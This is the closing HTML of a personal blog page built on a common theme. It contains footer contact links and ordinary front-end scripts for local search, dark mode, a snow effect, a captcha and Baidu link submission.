        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/wscyoulin" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1498041059@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1498041059" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1498041059" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/snow.js"><\/script>');
            }
        </script>
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
